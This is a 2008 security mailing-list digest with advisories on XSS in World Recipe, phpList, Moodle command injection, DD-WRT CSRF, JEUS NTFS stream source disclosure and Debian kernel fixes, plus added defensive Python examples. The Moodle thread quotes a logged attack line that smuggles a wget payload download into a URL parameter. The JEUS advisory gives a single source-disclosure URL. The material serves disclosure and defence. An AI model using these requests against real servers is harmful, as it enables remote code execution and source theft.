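A 404 (as in the thread's line) means the site did not expose texed.php at that path; a 200 on the same pattern is the one to escalate, since the command may have run.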


Multiple XSS Vulnerabilities in World Recipe 2.11

2008-12-15 Thread security
Armorize Technologies Security Advisory (Armorize-ADV-2008-0001)

Title:  Multiple XSS Vulnerabilities in World Recipe 2.11

Date:   2008/12/15

Status: Full

Class:  Input Validation Error

Bugtraq ID: N/A

Category:   Cross Site Scripting

Language:   ASP.NET (C#)

Description:
Armorize-ADV-2008-0001 discloses multiple cross-site scripting
vulnerabilities found in World Recipe, an ASP.NET 2.0 C# application
backed by a SQL database with stored procedures that stores and displays
recipes in a wide variety of categories.

Discussion:
World Recipe is vulnerable to cross-site scripting because it fails to
properly sanitize user-supplied input. Exploiting this vulnerability may
allow an attacker to make targeted users execute arbitrary script in the
context of the affected website. As a result, the attacker may be able to
steal authentication credentials such as cookies, alter the integrity of
the visited page, and launch other attacks such as phishing and forced
redirects.


Exploit:

http://www.example.com/[PATH]/emailrecipe.aspx
GET variable n is vulnerable.

http://www.example.com/[PATH]/recipedetail.aspx
GET variable id is vulnerable.

http://www.example.com/[PATH]/validatefieldlength.aspx
GET variable catid is vulnerable.


Vulnerable
Vendor: Ex-designz (http://www.ex-designz.net/)
Software:   World Recipe
Version:2.11
URL:http://www.ex-designz.net/softwaredetail.asp?fid=1884


Suggested Solution:
1. Constrain all input.
2. Reject all prohibited input.
3. Escape every input.

Disclosure Timeline:
2008/12/12 Vendor notification
2008/12/15 Full disclosure at SecurityFocus mailing list

Credit: Armorize Security Taskforce (ASF) at Armorize Technologies, Inc. 
(security dot armorize dot com)
Armorize Technologies is a software security company focusing on Web 
application security. The award-winning automated source code analysis 
solution, CodeSecure, provides the simplest and most accurate solution for 
identifying the root causes of vulnerabilities directly in the Web application 
source code and for enforcing Secure Software Development Lifecycle (Secure 
SDLC) effectively and efficiently.  Find out more at Armorize Technologies 
website, http://www.armorize.com.


phpList vulnerability

2008-12-15 Thread phplist

phpList is a feature rich newsletter application written in PHP.

phpList has a local file include vulnerability. The vulnerability has
already been exploited.

affected versions: any version up to including 2.10.7

fixed in version 2.10.8

Related links:
www.phplist.com phpList homepage
http://sourceforge.net/projects/phplist Sourceforge Project page.




Re: Moodle 1.9.3 Remote Code Execution

2008-12-15 Thread Jamie Riden
2008/12/15  l...@cooper.edu:
 Exploit in the wild:

 We saw this come across:

 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] GET 
 /filter/tex/texed.php?formdata=foo&pathname=foo\;wget -O 
 perso.wanadoo.es/medline/z1.php;echo+\ HTTP/1.1 404 218


 The host perso.wanadoo.es is still hosting the payload as of 
 [15/Dec/2008:00:14:00 -0500].

Looks like the usual sort of script to do things like execute
commands, upload/touch/delete files and eval() PHP. Only unusual in
that it's relatively clean and small.

I thought it was obfuscated at first glance, but it's just compressed
- only takes a couple of minutes to turn it into readable source.
(Just need to change ;eval($t) ?> at the end to ;echo($t) ?> and
run it from the CLI. Then add line breaks and formatting as required.)

cheers,
 Jamie
-- 
Jamie Riden / jam...@europe.com / ja...@honeynet.org.uk
http://www.ukhoneynet.org/members/jamie/


Re: Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)

2008-12-15 Thread 0xjbrown41
That is why it is called a remote command execution via a CSRF vulnerability. 
Your code should be AT LEAST checking referrers (weak and obscure but helpful) 
or implementing many of the other protections that are available.



See http://www.owasp.org/index.php/Cross-Site_Request_Forgery for more details.



Good info @ http://www.cgisecurity.com/articles/csrf-faq.shtml as well:



The most popular suggestion to preventing CSRF involves appending challenge 
tokens to each request. It is important to state that this challenge token MUST 
be associated with the user session, otherwise an attacker may be able to fetch 
a valid token on their own and utilize it in an attack. In addition to being 
tied to the user session it is important to limit the time period to which a 
token is valid. This method is documented in multiple documents however as 
pointed out in mailing list postings an attacker can utilize an existing 
browser vulnerability or XSS flaw to grab this session token.



The fact is, as long as one of these situations is available, the exploit can 
be auto-pwn:



1) The tab is open somewhere on the browser.

2) The session is still active in the browser.

3) The browser used has the credentials saved (No prompts /w Safari).

4) Nearly any situation where the target visits the page (but if not 1, 2, or 3, 
a prompt will usually pop up asking for credentials).
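Added example of the token scheme the quoted text describes, not code from DD-WRT or from the posters: the token is an HMAC over the session identifier and an expiry time, so a token an attacker fetches for their own session does not validate for the victim's, and a leaked token dies after the TTL. The request gate also applies the Origin/Referer check the reply calls weak but helpful, and refuses state changes over GET, which is a design choice of this example. The secret, session identifiers and router origin are constructed for the demo.

```python
"""Session-bound, time-limited anti-CSRF token plus a request gate
(added example; not DD-WRT code)."""
import base64
import binascii
import hashlib
import hmac
import secrets
import struct
import time

SERVER_SECRET = secrets.token_bytes(32)   # assumption: generated once per device, never sent to clients
TOKEN_TTL = 15 * 60                       # seconds a token stays valid


def _mac(session_id: str, expires: int) -> bytes:
    # Bind the token to the session and to its own expiry so neither can be swapped.
    msg = session_id.encode("utf-8") + b"|" + struct.pack(">Q", expires)
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()


def issue_token(session_id: str, now=None, ttl: int = TOKEN_TTL) -> str:
    """Token to embed in the form: expiry in the clear, MAC over session and expiry."""
    now = int(time.time()) if now is None else int(now)
    expires = now + ttl
    raw = struct.pack(">Q", expires) + _mac(session_id, expires)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def verify_token(token: str, session_id: str, now=None) -> bool:
    """Constant-time check that the token belongs to this session and is unexpired."""
    now = int(time.time()) if now is None else int(now)
    try:
        raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    except (binascii.Error, ValueError):
        return False
    if len(raw) != 8 + hashlib.sha256().digest_size:
        return False
    expires = struct.unpack(">Q", raw[:8])[0]
    if now >= expires:
        return False
    return hmac.compare_digest(raw[8:], _mac(session_id, expires))


def check_state_changing_request(method, headers, form, session_id, expected_origin, now=None):
    """Gate for anything that changes device state. Returns (allowed, reason).

    Origin/Referer is the weak check (some clients omit or can spoof it);
    the session-bound token is the real control.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return False, "state changes must not be reachable via GET"
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None or not (origin == expected_origin or origin.startswith(expected_origin + "/")):
        return False, "missing or foreign Origin/Referer"
    if not verify_token(form.get("csrf_token", ""), session_id, now):
        return False, "missing, foreign or expired csrf_token"
    return True, "ok"


if __name__ == "__main__":
    tok = issue_token("sess-A")
    print(check_state_changing_request("POST", {"Origin": "http://192.168.1.1"},
                                       {"csrf_token": tok}, "sess-A", "http://192.168.1.1"))
    print(check_state_changing_request("POST", {"Origin": "http://192.168.1.1"},
                                       {"csrf_token": tok}, "sess-B", "http://192.168.1.1"))
```

Because the expiry rides inside the MAC'd message, trimming or extending it invalidates the token; because the session id is the MAC input rather than part of the token, the token reveals nothing about the session it belongs to.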


TmaxSoft JEUS Alternate Data Streams Vulnerability

2008-12-15 Thread Simon Ryeo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Title: TmaxSoft JEUS Alternate Data Streams Vulnerability
Author: Simon Ryeo(bar4mi (at) gmail)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version:  JEUS 5: < Fix#26 on NTFS
References:
 - http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx
 - http://www.tmaxsoft.com
 - http://www.tmax.co.kr/tmaxsoft/index.screen
History:
 - 10.22.2008: Initial notification
 - 10.23.2008: The vendor responded
 - 11.21.2008: The vendor replied with detailed information.
 - 12.12.2008: The vendor finished preparing patches and responses.

Description:
On NTFS, TmaxSoft JEUS, a widely used web application server, contained
a vulnerability that allows an attacker to obtain web application source
files. It is caused by ADSs (Alternate Data Streams; ::$DATA). JEUS did
not handle the ::$DATA suffix, so when test.jsp::$DATA was requested it
was served as a normal (static) file instead of being executed as a JSP.
This is similar to the old Microsoft Windows IIS vulnerability (Bugtraq
ID 149, MS98-003).

Exploit:
The attacker can obtain them easily with a single URL request:
http://www.target.com/foo/bar.jsp::$DATA
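The following Python model is an added example, not JEUS code, of the routing mistake described above and the check that closes it. The bug is that the container decides "is this a JSP?" from the literal extension: /foo/bar.jsp::$DATA has extension ".jsp::$DATA", misses the servlet mapping and falls through to the static-file handler, and NTFS then opens bar.jsp's default data stream, so the source is returned. The hardened path percent-decodes the request (twice, to catch double encoding) and refuses any segment containing a colon before the extension is consulted. All paths are constructed.

```python
"""Rejecting NTFS alternate-data-stream names in request paths
(added example, not JEUS code)."""
import posixpath
from urllib.parse import unquote


def normalize_request_path(raw_path: str) -> str:
    """Decode twice (catches %253A-style double encoding), unify slashes, collapse dot segments."""
    path = unquote(unquote(raw_path))
    path = path.replace("\\", "/")            # Windows-hosted servers accept backslashes too
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)


def is_ads_probe(raw_path: str) -> bool:
    """True if any path segment uses NTFS stream syntax (name:stream or name::$TYPE).

    A colon is never legitimate inside a segment of a web path served from
    NTFS, so refusing all of them also covers streams other than ::$DATA.
    """
    path = normalize_request_path(raw_path)
    return any(":" in segment for segment in path.split("/") if segment)


def vulnerable_route(raw_path: str) -> str:
    """The behaviour the advisory describes: extension match on the literal path."""
    ext = posixpath.splitext(normalize_request_path(raw_path))[1].lower()
    return "jsp" if ext == ".jsp" else "static"


def hardened_route(raw_path: str) -> str:
    """Same decision, but ADS syntax is refused before the extension is consulted."""
    if is_ads_probe(raw_path):
        return "reject"
    return vulnerable_route(raw_path)


if __name__ == "__main__":
    for p in ["/foo/bar.jsp", "/foo/bar.jsp::$DATA",
              "/foo/bar.jsp%3A%3A%24DATA", "/images/logo.png"]:
        print(f"{p:32} vulnerable={vulnerable_route(p):7} hardened={hardened_route(p)}")
```

The vendor's Method 2 (switching WebtoB's communication method from 'URI' to 'EXT') changes how the path reaches JEUS; the colon check above is the container-side equivalent a developer can apply regardless of the front end.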

Solution:
The vendor released solutions for this problem.
Method 1) Upgrade JEUS
 - JEUS 5:
http://technet.tmax.co.kr/kr/download/platformList.do?groupCode=WAS&productCode=Jeus&versionCode=5.0.0.26.P&fc=down&sc=down_product&mid=binary
 - JEUS 4:
   a. Change the WebtoB function as described in Method 2
   b. Upgrade JEUS to version 6 (support for version 4 ends after Dec
2009)
Method 2) Change the WebtoB function
 - Change the message communication method from 'URI' to 'EXT'
   (This is valid whether you use the WebtoB embedded in JEUS or a
stand-alone WebtoB)
Method 3) Install the patch (ex. jext.jar)
 - The patch file will be valid until Jan. 2009
   (Target versions: 3.3.7.15, 4.0, 4.1, 4.2 final, 5.x; for each
version it is offered for releases below Fix#26)

Please refer to the TmaxSoft homepage for detailed support plans; they
are valid until Mar. 2009.
(http://www.tmaxsoft.com)

-BEGIN PGP SIGNATURE-
Version: 9.8.3.4028

wj8DBQFJQqOXzuoR/xLtCioRAn2DAKDpN2ckXu7xt6OvYUeWHLiEoPQOmwCg6csI
KY69SPNXHg2rHlXJanIBQDw=
=SW3P
-END PGP SIGNATURE--


Fwd: TmaxSoft JEUS Alternate Data Streams Vulnerability

2008-12-15 Thread Simon Ryeo
Dear bugtraq,

Thanks for your concern.

I saw BID 32804.

It contains one piece of incorrect information.

TmaxSoft JEUS 5 Fix#26 is not vulnerable. The vendor advises users to
upgrade to this version (Fix #26).

Please change this information.


Sincerely,
Simon




[SECURITY] [DSA 1687-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-12-15 Thread dann frazier
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1687-1secur...@debian.org
http://www.debian.org/security/   dann frazier
Dec 15, 2008http://www.debian.org/security/faq
- --

Package: linux-2.6
Vulnerability  : denial of service/privilege escalation
Problem type   : local/remote
Debian-specific: no
CVE Id(s)  : CVE-2008-3527 CVE-2008-3528 CVE-2008-4554 CVE-2008-4576
 CVE-2008-4933 CVE-2008-4934 CVE-2008-5025 CVE-2008-5029
 CVE-2008-5079 CVE-2008-5182 CVE-2008-5300

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service or privilege escalation. The Common
Vulnerabilities and Exposures project identifies the following
problems:

CVE-2008-3527

Tavis Ormandy reported a local DoS and potential privilege
escalation in the Virtual Dynamic Shared Objects (vDSO)
implementation.

CVE-2008-3528

Eugene Teo reported a local DoS issue in the ext2 and ext3
filesystems.  Local users who have been granted the privileges
necessary to mount a filesystem would be able to craft a corrupted
filesystem that causes the kernel to output error messages in an
infinite loop.

CVE-2008-4554

Milos Szeredi reported that the usage of splice() on files opened
with O_APPEND allows users to write to the file at arbitrary
offsets, enabling a bypass of possible assumed semantics of the
O_APPEND flag.

CVE-2008-4576

Vlad Yasevich reported an issue in the SCTP subsystem that may
allow remote users to cause a local DoS by triggering a kernel
oops.

CVE-2008-4933

Eric Sesterhenn reported a local DoS issue in the hfsplus
filesystem.  Local users who have been granted the privileges
necessary to mount a filesystem would be able to craft a corrupted
filesystem that causes the kernel to overrun a buffer, resulting
in a system oops or memory corruption.

CVE-2008-4934

Eric Sesterhenn reported a local DoS issue in the hfsplus
filesystem.  Local users who have been granted the privileges
necessary to mount a filesystem would be able to craft a corrupted
filesystem that results in a kernel oops due to an unchecked
return value.

CVE-2008-5025

Eric Sesterhenn reported a local DoS issue in the hfs filesystem.
Local users who have been granted the privileges necessary to
mount a filesystem would be able to craft a filesystem with a
corrupted catalog name length, resulting in a system oops or
memory corruption.

CVE-2008-5029

Andrea Bittau reported a DoS issue in the unix socket subsystem
that allows a local user to cause memory corruption, resulting in
a kernel panic.

CVE-2008-5079

Hugo Dias reported a DoS condition in the ATM subsystem that can
be triggered by a local user by calling the svc_listen function
twice on the same socket and reading /proc/net/atm/*vc.

CVE-2008-5182

Al Viro reported race conditions in the inotify subsystem that may
allow local users to acquire elevated privileges.

CVE-2008-5300

Dann Frazier reported a DoS condition that allows local users to
cause the out of memory handler to kill off privileged processes
or trigger soft lockups due to a starvation issue in the unix
socket subsystem.

For the stable distribution (etch), this problem has been fixed in
version 2.6.18.dfsg.1-23etch1.

We recommend that you upgrade your linux-2.6, fai-kernels, and
user-mode-linux packages.

Note: Debian 'etch' includes linux kernel packages based upon both the
2.6.18 and 2.6.24 linux releases.  All known security issues are
carefully tracked against both packages and both packages will receive
security updates until security support for Debian 'etch'
concludes. However, given the high frequency at which low-severity
security issues are discovered in the kernel and the resource
requirements of doing an update, lower severity 2.6.18 and 2.6.24
updates will typically release in a staggered or leap-frog fashion.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

The following matrix lists additional source packages that were rebuilt for
compatibility with or to take advantage of this update:

 Debian 4.0 (etch)
 fai-kernels 1.17+etch.23etch1
 user-mode-linux 2.6.18-1um-2etch.23etch1

You may use an automated update by adding the resources from the
footer